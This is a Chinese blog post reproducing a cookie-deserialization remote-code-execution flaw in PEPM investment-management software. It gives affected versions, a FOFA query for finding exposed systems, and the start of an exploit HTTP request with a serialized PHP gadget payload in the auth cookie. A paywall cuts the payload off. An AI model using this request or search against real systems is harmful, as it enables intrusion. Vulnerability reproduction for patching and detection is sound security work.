PEPM Cookie 远程代码执行漏洞复现(XVE-2024-16919)

已于 2024-08-05 14:17:39 修改
阅读量1k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-04 16:02:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140907116
版权

0x01 产品简介

PEPM是由苏州梓川信息科技有限公司开发的中国领先股权投资管理软件。PEPM致力于将成熟互联网技术与企业业务应用结合,为用户提供专业、易用且低成本的软件服务。PEPM覆盖了募、投、管、退等基金运营和业绩管理的各个环节,满足投资机构从项目筛选、尽职调查、投资决策、投后管理到退出清算的全流程管理需求。

0x02 漏洞概述

PEPM系统存在远程代码执行漏洞,Cookie的auth字段存在反序列化漏洞,攻击者可构造反序列化链生成恶意数据,执行任意PHP代码。

0x03 影响范围

PEPM  < V6.7.3.20240507.Release

0x04 复现环境

FOFA:header="pepm"

0x05 漏洞复现

Exp

GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Cookie: auth=a%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
PEPM系统Cookie请求头远程代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
08-06 286
PEPM系统存在远程代码执行漏洞Cookie的auth字段存在反序列化漏洞,攻击者可构造反序列化链生成恶意数据执行任意PHP代码
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 921
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
phpipam开源IP地址管理系未授权XSS漏洞分析(CVE-2017-6481)
afei001
02-11 494
首先了解这套系统的架构,是基于PHP MVC框架编写的。在来说说这套系统的权限控制,主要在以下两个方法中定义:
php: 远程操作浏览器cookie存储入门
海生的博客
08-02 982
本公众号,之前写过一个 js操作 cookie 的教程 这次写一个 php部分远程操作浏览器cookie存储 一.cookie理解,其实就是 浏览器的 一个本地存储,不过这个本地存储,在http握手的时候,会作为head头部带给 服务器,很方便服务器和浏览器数据同步啊! 二.更重要的是在,http握手的时候,服务器也可以操作head,设置cookie
PetitPotam 漏洞(CVE-2021-36942)分析
Jay
04-18 1077
PetitPotam 漏洞(CVE-2021-36942)分析 • 漏洞分析 攻击者可以通过构造恶意的文件路径,使得目标服务器尝试与攻击者控制的服务器建立连接。在这种情况下,攻击者可以捕获目标服务器的 NTLM 凭据,甚至可能实施更进一步的攻击,例如传递哈希攻击(Pass-the-Hash)或利用其他漏洞进行横向移动。 漏洞描述 --- PetitPotam 漏洞(CVE-2021-36942)是一个 Windows 远程协议(MS-EFSRPC)中的安全漏洞,它影响了微软的加密文件系统(EFS)。这个漏洞
HW漏洞威胁情报第三天|HW情报
weixin_43167326的博客
07-25 631
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!天问物业ERP系统ContractDownLoad存在任意文件读取漏洞。猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞。启明星辰天清汉马vpn存在任意文件读取漏洞。赛蓝企业管理系统存在任意文件上传漏洞
未公开1day PEPM Cookie 远程代码执行漏洞
weixin_43167326的博客
08-06 602
PEPM系统存在远程代码执行漏洞Cookie的auth字段存在反序列化漏洞,攻击者可构造反序列化链生成恶意数据,执行任意PHP代码
PEPM-中国领先的股权投资管理软件商业计划书.pdf
09-16
根据提供的文件信息,我们可以提取出关于“PEPM-中国领先的股权投资管理软件商业计划书”的相关知识点。这份商业计划书主要面向IT互联网行业的股权投资管理软件项目,介绍了一个软件项目的创业方案和程序开发计划。...
OPPO-Reno系列机型-mtk芯片解锁bl工具+root详细图文教程【仔细看支持机型】
05-28
2-----资源支持OPPO Reno6系列【cph2237 2251 peqm00 pepm00 cph2249】 3-----如果连驱动安装都不会 或者驱动签名安装不了等等基础问题都解决不了的请勿下载此资源。因为这些基本问题都无法解决。 后面的操作更有...
<div id="canvas" a="XDEBUG_PEPM" style="padding-top:70px;"> <div class="boardbox"> <form class="layui-form" action="" id="typform" onsubmit="return false;"> <div class="layui-form-item singel-input"> <div class="layui-row"> <div class="layui-col-xs6 layui-col-md2"> </div> <div class="layui-col-xs12 layui-col-md2"> <div class="dataTables_filter layui-input-block" id="searchKwdiv"> <label> <input type="search" name="title" id="searchKw" class="layui-input" placeholder="输入关键字回车"> </label> </div> </div>当这段代码里input输入框的值发生改变时通过jq来触发function
06-01
您可以使用以下代码: ``` $('#searchKw').bind('input propertychange', function() { // 在这里调用你的函数 }); ``` 这里使用jQuery的bind方法监听input输入框的输入事件,包括input和propertychange事件,当...
K8S集群系列四:部署kubernetes-dashboard
swpigris81的专栏
06-13 823
在完成基础服务部署之后,我们需要部署一个dashboard来管理我们的节点,监控我们的服务。 1:下载kubernetes-dashboard.yaml 可以直接按照官网的方式进行安装。但是鉴于镜像无法下载的原因,我把他下载到服务器上了。 [root@master dashboard]# wget -c https://raw.githubusercontent.com/kubernete...
HW漏洞威胁情报第七天|HW情报
weixin_43167326的博客
07-31 1431
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1238
信息安全工程师——机房安全分析与防护篇
叉车AI行人防撞预警系统,提升作业安全与效率
jiuxin666的博客
10-08 492
叉车AI行人防撞预警系统通过高清摄像头、雷达及深度学习算法,实现高精度环境监测与预警,预防碰撞事故,提升作业安全与效率,成为工业安全与生产提效的重要力量。
T-Box联网安全定义
xxdw1992的博客
10-10 1349
T-Box,即Telematics BOX,也称远程信息处理控制单元(Telematics Control Unit,TCU),是车联网中的重要组成部分。它集成了GPS、外部通信接口、电子处理单元、微控制器、移动通信单元和存储器等功能模块,为车端与车联网的连接提供了入口,并为车机等设备提供上网服务。然而,随着其功能的日益强大和联网特性的存在,T-Box的联网安全问题也日益凸显。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络篇
最新发布
鸿蒙的技术博客
10-10 432
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
PWN二进制安全修仙秘籍【第二章#二进制文件篇02】ELF文件详解
weixin_53801131的博客
10-07 756
形成一个进程镜像,每个进程都拥有独立的虚拟地址空间,这个空间如何布局是由记录在段头表中的程序头决定的。ELF文件头的e_phoff域给出了段头表的位置下面将展示一个可执行文件的程序头👇。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值